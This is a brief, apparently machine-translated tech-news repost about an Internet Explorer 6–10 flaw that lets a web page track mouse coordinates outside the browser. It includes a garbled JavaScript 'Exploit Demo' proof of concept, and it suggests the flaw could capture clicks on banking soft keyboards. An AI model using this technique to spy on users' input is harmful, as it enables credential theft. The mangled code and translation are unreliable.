Get the App
SLTechnology News&Howtos  ›  Network Security  › 

IE browser mouse coordinates tracking security risks, kill the full version

Shulou Source: shulou.com Published: 2022-06-01 02:21:16 10月04日 Update

I just saw another IE vulnerability on Seclist. The main impact of this vulnerability is the ability to track mouse coordinates, even if the current mouse position is in a non-browser window. The vulnerability was first discovered by the spider.io team.

Affected version: IE6-10

Test:

Create a new html file under the system directory as follows:

Exploit Demo window.attachEvent ("onload", function () {var detector = document.getElementById ("detector"); detector.attachEvent ("onmousemove", function (e) {contributor [XSS _ clean] = e.screenX + "," + e.screeny;}); setInterval (function () {detector.fireEvent ("onmousemove");}, 100); Open the new html file with IE

Imagine uploading the loophole to someone else's computer and using online silver, thinking that the soft keyboard is safe, but I don't think so after the test.

Tags: Vulnerabilities mouse location files impact testing security coordinates browser version browsing tracking disapproval code team other party first computer directory system Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno Shulou Information macOS Linux Apple OPPO Reno